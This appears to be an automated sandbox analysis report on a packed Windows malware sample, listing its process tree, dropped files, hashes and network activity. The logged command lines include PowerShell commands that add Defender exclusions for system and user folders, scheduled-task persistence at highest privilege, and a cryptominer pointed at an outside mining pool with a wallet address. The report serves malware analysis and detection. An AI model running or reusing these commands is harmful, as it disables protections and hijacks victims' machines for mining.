Analysis Overview
SHA256
05346140fbd935a2bd11cdb627178453624d5c2556ce5d253bd1a35095eaf0c9
Threat Level: Shows suspicious behavior
The file af9721f9690603beffdb08ccb2b8196a was found to be: Shows suspicious behavior.
Malicious Activity Summary
VMProtect packed file
Executes dropped EXE
Loads dropped DLL
Drops file in Windows directory
Unsigned PE
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-22 13:51
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-22 13:51
Reported
2023-12-23 20:32
Platform
win10v2004-20231215-en
Max time kernel
1s
Max time network
101s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs net.exe
Processes
C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe
"C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
"C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\Winteste.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 FILE
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0
C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe
"C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /XML C:\Windows\winserver.xml /tn winserver
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\WNDR.bat" "
C:\Windows\SysWOW64\net.exe
NET FILE
C:\Windows\WindowsNote.exe
"C:\Windows\WindowsNote.exe"
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 2
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 3
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 4
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 5
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 6
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 7
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 8
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 9
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 10
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 11
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 12
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 2.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/1768-0-0x0000000075070000-0x0000000075820000-memory.dmp
memory/1768-1-0x0000000000400000-0x00000000010F6000-memory.dmp
memory/1768-3-0x0000000005C30000-0x0000000005CC2000-memory.dmp
memory/1768-2-0x0000000005640000-0x0000000005BE4000-memory.dmp
memory/1768-4-0x0000000005E20000-0x0000000005E30000-memory.dmp
memory/1768-5-0x0000000005D50000-0x0000000005D5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
| MD5 | 66c26c027e47f7a9fe48fff9eb4b67c9 |
| SHA1 | 1dd6d7c9090d48021bc101c758f7845452273ce8 |
| SHA256 | 4366010a70d68b7327f69389b7739b0f82015d2412ae79637d1e386e27ca066a |
| SHA512 | 416d121363ad9162cb69349832b5d896ef751c19c74d39bb1cebf8d99323f72fe4c7db9a145746bb5b37a0cf6aa26edb9be8b5878d3e065c35dd01f2096d2b12 |
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
| MD5 | cff0d76dd193f340ea381cde76627072 |
| SHA1 | 9e5e58a3877f9cf3e441b3104e2cb7b8e8f2e1dd |
| SHA256 | a481487cf572da8b2cd08bb8686e359a5ba1177730cae5d19e5f95db5fcb79c0 |
| SHA512 | dc826b904bc251dcd1319d1a923b942812ab863e10fe7337fdc4fa6d5b5eb8ca5f66c512460883578562bf647d8d89505c71fcf8156cc2d64f0246a1294a76ad |
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1768-15-0x0000000075070000-0x0000000075820000-memory.dmp
memory/3100-45-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3100-44-0x0000000000400000-0x000000000061A000-memory.dmp
memory/3100-47-0x00000000051D0000-0x00000000051E0000-memory.dmp
memory/2732-66-0x0000000000FC0000-0x00000000011D4000-memory.dmp
memory/2732-69-0x000000001CC40000-0x000000001CC50000-memory.dmp
memory/2732-68-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/3100-67-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/2556-71-0x000001AE71DC0000-0x000001AE71DD0000-memory.dmp
memory/2556-72-0x000001AE71DC0000-0x000001AE71DD0000-memory.dmp
memory/2556-79-0x000001AE72000000-0x000001AE72022000-memory.dmp
memory/2556-70-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/3816-84-0x00007FF8076E0000-0x00007FF8076E2000-memory.dmp
memory/3816-83-0x00007FF8076D0000-0x00007FF8076D2000-memory.dmp
memory/3816-86-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/3816-85-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/5016-96-0x0000026FDFB30000-0x0000026FDFB40000-memory.dmp
memory/5016-97-0x0000026FDFB30000-0x0000026FDFB40000-memory.dmp
memory/5016-95-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/2556-93-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/5016-109-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/1720-111-0x00000149F5A50000-0x00000149F5A60000-memory.dmp
memory/1720-110-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/2732-122-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/1720-127-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/3064-128-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/2732-132-0x000000001CC40000-0x000000001CC50000-memory.dmp
memory/3592-134-0x0000027513750000-0x0000027513760000-memory.dmp
memory/3592-147-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/3816-146-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/3592-133-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
C:\Windows\Winteste.bat
| MD5 | f88ec3f41e6a0bec16c8233002d9cedd |
| SHA1 | cc481e1ada898780077d3b048cad545f43624b92 |
| SHA256 | 310ff49f6a041d5a1fb93460afc21ef1cd7ee80675053953566072422f10367e |
| SHA512 | 9abb41ce50001957c0e5339a3aa703255ce13235e304eb355d320001674b2850c4f8f09c3721d5f7a077b2e12bcc23c588fa88248704987eada6eea633179bad |
C:\Windows\WindowsNote.exe
| MD5 | e0cff336d52bb06820e03c5542097518 |
| SHA1 | 91194679e106c55225c436be8bf3d9bfb7aff42a |
| SHA256 | 01f07014eb271777d582ed989ab32058194340c3e24f7d7884b2eecf54bca36d |
| SHA512 | cfd54560ea82a440d7627fd344835d24594b36c55da3ca70493d60c1b7a697fa4ab60a9ddf0271ce756696a4b541dfead8a108f30581d44393c18048280ce9a0 |
memory/896-151-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/896-155-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/2320-163-0x0000000001460000-0x0000000001472000-memory.dmp
memory/2320-164-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/2320-167-0x0000000003780000-0x0000000003790000-memory.dmp
memory/3064-166-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/2320-162-0x00000000008A0000-0x0000000000AA6000-memory.dmp
memory/2732-158-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/780-196-0x0000021467AA0000-0x0000021467AB0000-memory.dmp
memory/780-195-0x0000021467AA0000-0x0000021467AB0000-memory.dmp
memory/780-193-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/2320-183-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/780-198-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/1076-182-0x000000001BDF0000-0x000000001BE00000-memory.dmp
memory/4028-211-0x0000026FF3F80000-0x0000026FF3F90000-memory.dmp
memory/4028-210-0x0000026FF3F80000-0x0000026FF3F90000-memory.dmp
memory/4028-209-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/4028-213-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/1076-181-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/3028-226-0x0000029AEA850000-0x0000029AEA860000-memory.dmp
memory/3028-225-0x0000029AEA850000-0x0000029AEA860000-memory.dmp
memory/3028-224-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/3028-228-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/2896-239-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/2896-241-0x0000027352FA0000-0x0000027352FB0000-memory.dmp
memory/2896-240-0x0000027352FA0000-0x0000027352FB0000-memory.dmp
memory/2896-243-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/1076-245-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/2392-248-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/2392-252-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/1076-254-0x00007FFFE7D30000-0x00007FFFE87F1000-memory.dmp
memory/5072-258-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/5072-262-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/3124-266-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/2172-274-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/4628-282-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/4688-290-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/3408-298-0x0000000140000000-0x0000000141B3D000-memory.dmp
memory/3920-306-0x0000000140000000-0x0000000141B3D000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-22 13:51
Reported
2023-12-23 20:32
Platform
win7-20231215-en
Max time kernel
1s
Max time network
121s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\choice.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Winteste.bat | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\__tmp_rar_sfx_access_check_259395092 | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\WNDR.bat | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\WindowsUpdaters.vbs | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\Windows.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\WindowsNote.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\WindowsNote.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\WNDR.bat | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\winserver.xml | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\Windows.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\Winteste.bat | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File created | C:\Windows\WindowsUpdaters.vbs | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
| File opened for modification | C:\Windows\winserver.xml | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs net.exe
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2508 wrote to memory of 3024 | N/A | C:\Windows\system32\choice.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe |
| PID 2508 wrote to memory of 3024 | N/A | C:\Windows\system32\choice.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe |
| PID 2508 wrote to memory of 3024 | N/A | C:\Windows\system32\choice.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe |
| PID 2508 wrote to memory of 3024 | N/A | C:\Windows\system32\choice.exe | C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe
"C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 FILE
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0
C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe
"C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /XML C:\Windows\winserver.xml /tn winserver
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\WNDR.bat" "
C:\Windows\SysWOW64\net.exe
NET FILE
C:\Windows\WindowsNote.exe
"C:\Windows\WindowsNote.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Winteste.bat" "
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
"C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 1
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 2
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 3
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 4
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 5
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 6
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 7
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 8
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 9
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 10
C:\Windows\Windows.exe
Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 11
Network
Files
memory/2508-1-0x0000000000400000-0x00000000010F6000-memory.dmp
